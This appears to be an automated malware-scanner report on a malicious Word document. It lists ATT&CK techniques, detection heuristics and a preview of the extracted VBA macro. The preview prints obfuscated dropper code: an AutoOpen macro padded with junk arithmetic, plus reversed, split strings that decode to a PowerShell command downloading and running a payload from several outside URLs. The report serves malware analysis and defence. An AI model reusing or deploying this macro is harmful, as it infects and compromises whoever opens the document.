MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros, indicated by multiple heuristic firings including OLE_VBA_MACROS and OLE_VBA_AUTOOPEN. The critical OLE_VBA_SHELL firing suggests the macro attempts to execute external code. The SE_PASSWORD_ARCHIVE_LURE heuristic indicates the document likely instructs the user to open a password-protected archive, a common tactic to bypass gateway security. The Autoopen macro is present and likely initiates the malicious execution chain.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6543332-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6543332-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 123835 bytes |
SHA-256: bee0ac40a5e438f2d7f1016d0a647081b9a84268f2fc0a9a1b4fa42a24566b86 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "mPkTWCQHoBKZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JlAnis(TwaGZB)
piMcJN = YLSlQ + Sgn(91093 - bFnoBD - jJBzX + Fix(6584)) - 65506 - CDbl(92662)
JVvsk = BtOii
ahBSzG = qmSXzT
VKclK = 69863
End Sub
Sub EIQVDt(DtaTZ)
Fbzhaw = FUrzzZ + Sgn(52783 - rRcXuI - YlzuN + Fix(57405)) - 75045 - CDbl(86423)
EYjDtK = LNuXkR
YiSWM = zvfakC
kjjMS = 52117
tYpYwj = QKzll + Sgn(14126 - YQvHa - uIsJT + Fix(82131)) - 92913 - CDbl(21708)
dhEJSY = otYjGh
fpwvuL = oErKF
jfFHkK = 70876
RjcpuZ = BjtKNX + Sgn(24722 - UvBAP - dMwMnS + Fix(17274)) - 78280 - CDbl(32373)
vwEOIW = AlonV
ArNTLk = iKVro
dcHGS = 24193
End Sub
Sub zOQSw(woBOa)
HOwVZ = zEENkb + Sgn(24488 - psdsi - aDAlb + Fix(90260)) - 39562 - CDbl(1540)
Xhvuqj = fHhHV
NkipG = VFKIk
aEOMt = 59076
wShfoj = skNWL + Sgn(44741 - SpPHl - vfjMZL + Fix(80939)) - 30515 - CDbl(55005)
SNCcYq = FpIjhk
owNCHO = FIpjRl
FdqGP = 90785
End Sub
Sub Autoopen()
On Error Resume Next
JIuccI = ScFOu + Sgn(79874 - cwnIN - MEMsHE + Fix(22831)) - 99687 - CDbl(22178)
dRpvi = SZfGqm
kVWvwc = DwCFiE
CVXwJG = 20549
uKIzvuWwhpD (wEttoj + iQfXBvCI + cHzZY)
WkJPWj = iPkMZ + Sgn(85819 - EHJjf - JYSBC + Fix(77324)) - 97803 - CDbl(79333)
uFIjT = kOhmaw
hUhTwQ = VwTuD
zSHMi = 64508
End Sub
Sub IUiDt(kTsbt)
ZMqwU = sifAwm + Sgn(28570 - AhSHUE - WoNpda + Fix(44018)) - 62660 - CDbl(80199)
WZodGH = mdqzt
YsoQY = BlGpM
XdIqJ = 40932
pYZMa = tazUrN + Sgn(87898 - fpwoJw - oqQjcb + Fix(67262)) - 56800 - CDbl(22279)
UVzDjw = ORfbDQ
cSZso = BzXXB
JczYKz = 73806
WswZw = RarSCk + Sgn(50866 - HJBqp - uUwaBC + Fix(80062)) - 6125 - CDbl(32070)
UiRrtk = Awwub
EURHI = oWTHm
BtVXtA = 26617
End Sub
Sub wwYSi(XmAur)
SNuFk = jicWAW + Sgn(59277 - rqAdC - jSJFww + Fix(46865)) - 3521 - CDbl(95233)
VZQhM = zQnwTf
bzBoVP = mXstYz
oIlWi = 70422
End Sub
Attribute VB_Name = "BbFzADqkpEd"
Sub lhIuK(mQPzj)
JMkLH = bpvGa + Sgn(40951 - qUMqCh - QXOWfO + Fix(51431)) - 38622 - CDbl(85605)
LDvio = Sicoco
iHnwT = aZNQsH
zOftbH = 93500
End Sub
Function iQfXBvCI()
On Error Resume Next
vXaNCj = LZtLbQ + Sgn(70167 - sPGlS - znCbCq + Fix(9279)) - 98457 - CDbl(67472)
Vrfjk = lRBjN
WhfVNz = iUVifz
XlApoM = 81326
NzoNci = XHuIa + Sgn(93738 - LLsrz - LVvRt + Fix(91494)) - 5209 - CDbl(74700)
NSQmvR = UziqB
lnccFA = LdqWW
sBWUjf = 28159
CREsShnpEN = uJOXwd("zOd9Q ))69]raHC[,'G5o' ecAlper- 29]raHC[,)87]raHC[+701]raoc", 62186 + 3 - 62186, 62186 + 53 - 62186)
tcroBj = qsNJR + Sgn(26485 - IpQqBi - kbuPNY + Fix(11861)) - 96405 - CDbl(58991)
KnVrLk = DREVld
EUJth = qdkrJ
zYnKz = 84760
wQozC = sDXIWB + Sgn(40934 - XBjEw - PHJKQh + Fix(30984)) - 84329 - CDbl(78644)
SziivT = qGdjJm
vLBQvk = jTmBrH
jVXAOo = 80226
umCtXoj = uJOXwd("ML, CDSH3a;)X'+'6y@X'+'6y(tilpS.X6y/B8V'+'VVJ'+'G/moc.ovoted'+'//:ptth'+'@/HrEUR'+'/moc.'+'eir'+'tsudni-'+'eira//:pt'+'th@/YY3n'+'FS/ed'+'.esie'+'r-nrey'+'ab//'+':ptth@/4E'+'hGM/nijp", 26860 + 5 - 26860, 26860 + 175 - 26860)
WrQDP = zUPFUi + Sgn(29153 - jzwEq - jsdELI + Fix(18797)) - 71447 - CDbl(11571)
vwoYoK = rVAiw
vXcOb = YEKzDr
OMsGiM = 28396
wfwWYd = iJtlX + Sgn(99691 - IqCQF - mLhhN + Fix(3604)) - 85527 - CDbl(27579)
IiRLdk = LqbmY
QaTnI = BPQIc
tkzPIW = 71102
EZMDuTT = uJOXwd("bSited.nesier-anit'+'a//'+':pt'+'th@/Vm'+'TY'+'M3N/'+'zib.mar'+'gtpa//'+':'+'p'+'tth X6y = XCDAH'+'3'+'a;)331282 ,00'+'001'+'('+'txen.d'+'sada'+'s'+'nH3a '+'= BSNH3a;tneilCSP", 63779 + 3 - 63779, 63779 + 168 - 63779)
mBKTLV = IiMpSi + Sgn(26585 - GOathM - rapQkz + Fix(4963)) - 93420 - CDbl(64183)
CimOQ = bmfslD
KRfoq = idDhJ
kivlf = 12249
ziMjB = kVjsQ + Sgn(84936 - bNFhot - PAhbG + Fix(13115)) - 27158 - CDbl(27021)
RiiQCU = mrKXi
VoYXwJ = vVWOw
zAkduH = 42755
rbtTjqasHa = uJOXwd("U7Z%@beW'+'.t'+'eN.m'+'ets'+'yS )X6'+'yt'+'c'+'ejbo-X'+'6y+'+'X'+'6yw'+'X6y+X6yenX'+'6y(. = UYYH3a;m'+'odnar )'+'X'+'6ytX6'+'y'+'+X6kUB", 65407 + 4 - 65407,
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.